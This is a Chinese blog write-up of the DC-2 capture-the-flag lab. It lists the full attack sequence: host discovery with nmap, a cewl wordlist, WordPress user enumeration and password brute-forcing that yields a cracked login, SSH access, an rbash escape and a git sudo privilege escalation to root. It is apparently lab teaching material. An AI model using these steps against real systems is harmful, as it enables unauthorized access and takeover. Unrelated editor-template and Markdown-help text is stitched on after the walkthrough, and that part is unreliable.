渗透测试实验
项目场景:
某高校校园网络渗透项目
nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.92.1/24不扫描端口,来判定主机是否存活。
nmap -A -p- -T4 192.168.92.133 探测靶场突破口
开放了7744端口号,服务为ssh,80端口,服务为http
访问80端口,寻找进一步突破口,直接使用ip访问会跳转到http://dc-2/,所以添加hosts文件,让这个跳转域名来访问靶场ip
在/etc/hosts文件中添加域名
成功访问域名,并得到flag1
根据提示,提示使用cewl来生成字典
输入命令:cewl dc-2 > password,爬取dc-2页面,将关键字生成字典写入到password文件中
查看网站源码,发现网站中URL目录结构为wp-*的,猜测网站为wordpress搭建的
使用wpscan这个专门扫描检测wordpress搭建的工具来查看是否存在已知漏洞
使用命令:wpscan --url dc-2,扫到wordpress的版本,ip地址等信息
使用命令:wpscan --url dc-2 -e u,用户信息枚举,得到几个可以用来登录的账户
使用得到的用户名,创建一个username用户文件.
用户名还有cewl得到的密码尝试爆破,成功爆破出两个账户密码
因为wordpress的后台登录目录是公开的,所以直接访问/wp-admin,成功出现后台登录界面
使用爆破的账户密码,登录成功
Username: jerry, Password: adipiscing
在jerry账户中,得到flag2
根据flag2的提示,找另一个入口,想到ssh服务,使用命令:ssh tom@192.168.92.133 -p 7744,成功登录ssh
得到flag3,因为cat无法使用,所以使用vi命令,得到提示
因为使用tab,cat等命令无法使用,所以知道当前账户是受限制的,所以可以进行rbash绕过
输入以下命令:
BASH_CMDS[a]=/bin/bash
a
/bin/bash
export PATH=PATH:/sbin:/bin
输入之后,可以正常使用受限制的命令了
进行收集信息,使用命令:ls -alhR /home,得到flag4和jerry账户信息
根据flag4的提示信息,明显是要使用git提权
使用命令:su jerry,切换到jerry账户
使用命令:sudo -l,查看可以无密码使用root权限的命令,果然是git
git提权的方法输入命令:sudo git help config
之后直接在出现的help界面,输入 !/bin/bash,成功提权
切换到root账户根目录,成功得到最后的final-flag.txt
原因分析:
提示:这里填写问题的分析:
例如:Handler 发送消息有两种方式,分别是 Handler.obtainMessage()和 Handler.sendMessage(),其中 obtainMessage 方式当数据量过大时,由于 MessageQuene 大小也有限,所以当 message 处理不及时时,会造成先传的数据被覆盖,进而导致数据丢失。
解决方案:
提示:这里填写该问题的具体解决方案:
例如:新建一个 Message 对象,并将读取到的数据存入 Message,然后 mHandler.obtainMessage(READ_DATA, bytes, -1, buffer).sendToTarget();换成 mHandler.sendMessage()。
欢迎使用Markdown编辑器
你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。
新的改变
我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:
- 全新的界面设计 ,将会带来全新的写作体验;
- 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示;
- 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示;
- 全新的 KaTeX数学公式 语法;
- 增加了支持甘特图的mermaid语法1 功能;
- 增加了 多屏幕编辑 Markdown文章功能;
- 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能,功能按钮位于编辑区域与预览区域中间;
- 增加了 检查列表 功能。
功能快捷键
撤销:Ctrl/Command + Z
重做:Ctrl/Command + Y
加粗:Ctrl/Command + B
斜体:Ctrl/Command + I
标题:Ctrl/Command + Shift + H
无序列表:Ctrl/Command + Shift + U
有序列表:Ctrl/Command + Shift + O
检查列表:Ctrl/Command + Shift + C
插入代码:Ctrl/Command + Shift + K
插入链接:Ctrl/Command + Shift + L
插入图片:Ctrl/Command + Shift + G
查找:Ctrl/Command + F
替换:Ctrl/Command + G
合理的创建标题,有助于目录的生成
直接输入1次#,并按下space后,将生成1级标题。
输入2次#,并按下space后,将生成2级标题。
以此类推,我们支持6级标题。有助于使用TOC语法后生成一个完美的目录。
如何改变文本的样式
强调文本 强调文本
加粗文本 加粗文本
标记文本
删除文本
引用文本
H2O is是液体。
210 运算结果是 1024.
插入链接与图片
链接: link.
图片:
带尺寸的图片:
居中的图片:
居中并且带尺寸的图片:
当然,我们为了让用户更加便捷,我们增加了图片拖拽功能。
如何插入一段漂亮的代码片
去博客设置页面,选择一款你喜欢的代码片高亮样式,下面展示同样高亮的 代码片.
// An highlighted block
var foo = 'bar';
生成一个适合你的列表
- 项目
- 项目
- 项目
- 项目
- 项目1
- 项目2
- 项目3
- 计划任务
- 完成任务
创建一个表格
一个简单的表格是这么创建的:
| 项目 | Value |
|---|---|
| 电脑 | $1600 |
| 手机 | $12 |
| 导管 | $1 |
设定内容居中、居左、居右
使用:---------:居中
使用:----------居左
使用----------:居右
| 第一列 | 第二列 | 第三列 |
|---|---|---|
| 第一列文本居中 | 第二列文本居右 | 第三列文本居左 |
SmartyPants
SmartyPants将ASCII标点字符转换为“智能”印刷标点HTML实体。例如:
| TYPE | ASCII | HTML |
|---|---|---|
| Single backticks | 'Isn't this fun?' |
‘Isn’t this fun?’ |
| Quotes | "Isn't this fun?" |
“Isn’t this fun?” |
| Dashes | -- is en-dash, --- is em-dash |
– is en-dash, — is em-dash |
创建一个自定义列表
-
Markdown
- Text-to- HTML conversion tool Authors
- John
- Luke
如何创建一个注脚
一个具有注脚的文本。2
注释也是必不可少的
Markdown将文本转换为 HTML。
KaTeX数学公式
您可以使用渲染LaTeX数学表达式
最低0.47元/天 解锁文章
1239
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
